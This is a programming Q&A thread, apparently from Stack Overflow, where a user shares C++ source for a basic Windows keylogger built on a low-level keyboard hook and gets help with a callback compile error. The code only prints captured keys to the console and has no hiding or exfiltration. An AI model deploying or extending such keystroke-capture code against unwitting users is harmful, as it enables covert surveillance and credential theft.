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I`m working on keylogger, and this is what I got

Keylogger.h:

#pragma once
#include <stdio.h>
#include <windows.h>

class Keylogger
{
    KBDLLHOOKSTRUCT kbdStruct;
    BYTE keyState[256];
    WCHAR buffer[16];

public:
    HHOOK hKeyHook;

    Keylogger(void);
    ~Keylogger(void);
    LRESULT WINAPI KeyEvent(int nCode, WPARAM wParam, LPARAM lParam);
};

Keylogger.cpp:

#include "Keylogger.h"


Keylogger::Keylogger(void)
{
}


Keylogger::~Keylogger(void)
{
}

LRESULT WINAPI Keylogger::KeyEvent(int nCode, WPARAM wParam, LPARAM lParam)
{
    if( (nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)) )
    {
        kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);
        GetKeyboardState((PBYTE)&keyState);
        ToUnicode(kbdStruct.vkCode, kbdStruct.scanCode, (PBYTE)&keyState, (LPWSTR)&buffer, sizeof(buffer) / 2, 0);
        printf("%X\t%c\n", buffer[0], buffer[0]);
    }

    return CallNextHookEx(hKeyHook, nCode, wParam, lParam);
}

main.cpp:

#include "Keylogger.cpp"

int main(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int nCmdShow)
{
    Keylogger kl = Keylogger();

    kl.hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC) kl.KeyEvent, GetModuleHandle(NULL), 0);

    MSG message;
    while(GetMessage(&message, NULL, 0, 0))
    {
        TranslateMessage(&message);
        DispatchMessage(&message);
    }

    UnhookWindowsHookEx(kl.hKeyHook);
    return 0;
}

On the following line kl.hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC) kl.KeyEvent, GetModuleHandle(NULL), 0); i get error C2440: 'type cast' : cannot convert from 'overloaded-function' to 'HOOKPROC'

Is there a way to fix this?

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WinAPI is mostly a C programming interface, so it doesn't know about classes. The callback should be static:

static LRESULT WINAPI KeyEvent(int nCode, WPARAM wParam, LPARAM lParam);

Then

kl.hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC) Keylogger::KeyEvent, GetModuleHandle(NULL), 0);
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  • If callback is static, then class members used in implementation of the KeyEvent function(hKeyHook, kbdStruct, keyState and buffer) give me error - a nonstatic member reference must be relative to a specific object. How do I handle that?
    – legionar
    Oct 7, 2013 at 17:48
  • Declare and instantiate a global Keylogger object before installing the hook. The callback can then access that object when needed. A Keyboard hook is called in the context of the thread that installs the hook. If you need to access private members of the object, that is fine, since a static method would still be a member of the class, you would simply use the global Keylogger object instead of the (missing) this pointer to access them, that's all. Oct 7, 2013 at 18:14
  • You shouldn't need the (HOOKPROC) cast if the function signature is correct. Oct 7, 2013 at 19:49
  • Ivan's response similarly applies to the WinSock 2 API. Dec 5, 2017 at 21:32
  • Global var will not work in case of a multi-threaded environment. Threadvar also would not work because async callback is called on a different thread. Some APIs allow passing a pointer to an app-defined context to callback (e.g. WinHTTP) Mar 14, 2023 at 11:20

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